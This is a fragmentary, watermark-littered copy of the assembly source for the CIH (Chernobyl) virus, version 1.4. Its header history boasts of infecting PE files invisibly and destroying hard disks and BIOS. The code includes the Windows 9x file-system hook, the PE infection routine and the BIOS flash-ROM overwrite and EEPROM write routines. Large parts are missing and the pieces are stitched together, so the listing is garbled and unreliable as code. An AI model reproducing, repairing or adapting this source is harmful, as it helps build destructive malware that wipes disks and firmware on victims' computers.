; ****************************************************************************
; * The Virus Program Information *
; ****************************************************************************
; * *
; * Designer : CIH Source : TTIT of TATUNG in Taiwan *
; * Create Date : 04/26/1998 Now Version : 1.4 *
; * Modification Time : 05/31/1998 *
; * *
; * Turbo Assembler Version 4.0 : tasm /m cih *
; * Turbo Link Version 3.01 : tlink /3 /t cih, cih.exe *
; * *
; *==========================================================================*
; * Modification History *
; *==========================================================================*
; * v1.0 1. Create the Virus Program. *
; * 2. The Virus Modifies IDT to Get Ring0 Privilege. *
; * 04/26/1998 3. Virus Code doesn't Reload into System. *
; * 4. Call IFSMgr_InstallFileSystemApiHook to Hook File System. *
; * 5. Modifies Entry Point of IFSMgr_InstallFileSystemApiHook. *
; * 6. When System Opens Existing PE File, the File will be * www.bitsCN.com
; * Infected, and the File doesn't be Reinfected. *
; * 7. It is also Infected, even the File is Read-Only. *
; * 8. When the File is Infected, the Modification Date and Time *
; * of the File also don't be Changed. *
; * 9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not Call *
; * Previous FileSystemApiHook, it will Call the Function *
; * that the IFS Manager Would Normally Call to Implement *
; * this Particular I/O Request. *
; * 10. The Virus Size is only 656 Bytes. *
; *==========================================================================*
; * v1.1 1. Especially, the File that be Infected will not Increase *
; * it's Size... ^__^ *
; * 05/15/1998 2. Hook and Modify Structured Exception Handing. *
; * When Exception Error Occurs, Our OS System should be in *
; * Windows NT. So My Cute Virus will not Continue to Run, *
; * it will Jmup to Original Application to Run. *
; * 3. Use Better Algorithm, Reduce Virus Code Size. * www.bitsCN.com
; * 4. The Virus "Basic" Size is only 796 Bytes. *
; *==========================================================================*
; * v1.2 1. Kill All HardDisk, and BIOS... Super... Killer... *
; * 2. Modify the Bug of v1.1 *
; * 05/21/1998 3. The Virus "Basic" Size is 1003 Bytes. *
; *==========================================================================*
; * v1.3 1. Modify the Bug that WinZip Self-Extractor Occurs Error. *
; * So When Open WinZip Self-Extractor ==> Don't Infect it. *
; * 05/24/1998 2. The Virus "Basic" Size is 1010 Bytes. *
; *==========================================================================*
; * v1.4 1. Full Modify the Bug : WinZip Self-Extractor Occurs Error. *
; * 2. Change the Date of Killing Computers. *
; * 05/31/1998 3. Modify Virus Version Copyright. *
; * 4. The Virus "Basic" Size is 1019 Bytes. *
; **************************************************************************** 中国_网管联盟
; ****************************************************************************
; * Original PE Executable File(Don't Modify this Section) *
; ****************************************************************************
db 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h
db 004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h
db 0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h
db 00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh
db 021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h
db 069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h
db 061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh
db 074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh bbs.bitsCN.com
db 020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h
db 06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah
db 024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h
db 0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h
db 00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h
db 000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h
db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h
db 000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h
db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
db 000h, 000h, 000h, 000h, 010h, 000h, 000h, 000h
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db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h bitsCN_com
db 0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
dd 00000000h, VirusSize
; *************************************
; * When Exception Error Occurs, *
; * Our OS System should be in NT. *
; * So My Cute Virus will not *
; * Continue to Run, it Jmups to *
; * Original Application to Run. *
; *************************************
; *************************************
; * Install My File System Api Hook *
; *************************************
lea eax, FileSystemApiHook-@6[edi]
push eax ;
int 20h ; VXDCALL IFSMgr_InstallFileSystemApiHook
IFSMgr_InstallFileSystemApiHook = $ ;
dd 00400067h ; Use EAX, ECX, EDX, and flags
mov dr0, eax ; Save OldFileSystemApiHook Add
pop eax ; EAX = FileSystemApiHook Address
; Save Old IFSMgr_InstallFileSystemApiHook Entry Point
mov ecx, IFSMgr_InstallFileSystemApiHook-@2[esi]
mov edx, [ecx]
mov OldInstallFileSystemApiHook-@3[eax], edx
push ebx
int 20h ; VXDCALL IFSMgr_RemoveFileSystemApiHook
IFSMgr_RemoveFileSystemApiHook = $
dd 00400068h ; Use EAX, ECX, EDX, and flags
pop eax
; Call Original IFSMgr_InstallFileSystemApiHook
; to Link Client FileSystemApiHook
push dword ptr [esp+8]
call OldInstallFileSystemApiHook-@3[ebx]
pop ecx
push eax
; Call Original IFSMgr_InstallFileSystemApiHook
; to Link My FileSystemApiHook
push ebx
call OldInstallFileSystemApiHook-@3[ebx]
pop ecx
mov dr0, eax ; Adjust OldFileSystemApiHook A
pop eax
pop ebx
; *********************************************************
; * Static Data *
; *********************************************************
; *************************************
; * Get FilePath's DriveNumber, *
; * then Set the DriveName to *
; * FileNameBuffer. *
; *************************************
; * Ex. If DriveNumber is 03h, *
; * DriveName is 'C:'. *
; *************************************
mov al, [ebx+04h]
cmp al, 0ffh
je CallUniToBCSPath
add al, 40h
mov ah, ':'
mov [esi], eax
inc esi
inc esi
; *************************************
; * UniToBCSPath *
; *************************************
; * This Service Converts *
; * a Canonicalized Unicode Pathname *
; * to a Normal Pathname in the *
; * Specified BCS Character Set. *
; *************************************
; Move ESI to the Start of SectionTable
lea esi, (StartOfSectionTable-@8)[esi]
push eax ; Size
push edx ; Pointer of File
push esi ; Address of Buffer
; ***************************
; * The Code Size of Merge *
; * Virus Code Section and *
; * Total Size of Virus *
; * Code Section Table Must *
; * be Small or Equal the *
; * Unused Space Size of *
; * Following Section Table *
; ***************************
inc ecx
push ecx ; Save NumberOfSections+1
shl ecx, 03h
push ecx ; Save TotalSizeOfVirusCodeSectionTable
add ecx, eax
add ecx, edx
sub ecx, (SizeOfHeaders-@9)[esi]
not ecx
inc ecx
; Save My Virus First Section Code
; Size of Following Section Table...
; ( Not Include the Size of Virus Code Section Table )
push ecx
xchg ecx, eax ; ECX = Size of Section Table
; Save Original Address of Entry Point
mov eax, (AddressOfEntryPoint-@9)[esi]
add eax, (ImageBase-@9)[esi]
mov (OriginalAddressOfEntryPoint-@9)[esi], eax
cmp word ptr [esp], small CodeSizeOfMergeVirusCodeS
jl OnlySetInfectedMark
; ***************************
; * Let's Set Total Virus *
; * Code Section Table *
; ***************************
; EBX = My Virus First Section Code
; Size of Following Section Table
pop ebx
pop edi ; EDI = TotalSizeOfVirusCodeSectionTabl
pop ecx ; ECX = NumberOfSections+1
push edi ; Size
add edx, ebp
push edx ; Pointer of File
add ebp, esi
push ebp ; Address of Buffer
; ***************************
; * Set the First Virus *
; * Code Section Size in *
; * VirusCodeSectionTable *
; ***************************
lea eax, [ebp+edi-04h]
mov [eax], ebx
; *************************** DL.bitsCN.com网管软件下载
; * Let's Set My Virus *
; * First Section Code *
; ***************************
push ebx ; Size
add edx, edi
push edx ; Pointer of File
lea edi, (MyVirusStart-@9)[esi]
push edi ; Address of Buffer
; ***************************
; * Let's Modify the *
; * AddressOfEntryPoint to *
; * My Virus Entry Point *
; ***************************
mov (NewAddressOfEntryPoint-@9)[esi], edx
; ***************************
; * Setup Initial Data *
; ***************************
mov di, 0058h
dec edx ; and a
mov word ptr (BooleanCalculateCode-@10)[esi], 0f24h
call esi
; ***********************
; * Show the BIOS Extra *
; * ROM Data in Memory *
; * 000E0000 - 000E01FF *
; * ( 512 Bytes ) *
; * , and the Section *
; * of Extra BIOS can *
; ***********************
; * Kill the BIOS Extra *
; * ROM Data in Memory *
; * 000E0000 - 000E007F *
; * ( 80h Bytes ) *
; ***********************
xor ah, ah
mov [eax], al
xchg ecx, eax
loop $
; ***********************
; * Show and Enable the *
; * BIOS Main ROM Data *
; * 000E0000 - 000FFFFF *
; * ( 128 KB ) *
; * can be Writted... *
; ***********************
int 20h
mov [ecx], al
mov byte ptr [eax], 80h
mov [eax], cl
mov [ecx], al
; ***************************
; * IO for EEPROM *
; ***************************
xchg eax, edi
xchg edx, ebp
out dx, eax
xchg eax, edi
xchg edx, ebp
in al, dx
BooleanCalculateCode = $
or al, 44h
xchg eax, edi
xchg edx, ebp
out dx, eax
xchg eax, edi
xchg edx, ebp
out dx, al
; *********************************************************
; * Static Data *
; *********************************************************
LastVxDCallAddress = IFSMgr_Ring0_FileIO
VxDCallAddressTable db 00h
db IFSMgr_RemoveFileSystemApiHook-_PageAllocate
db UniToBCSPath-IFSMgr_RemoveFileSystemApiHook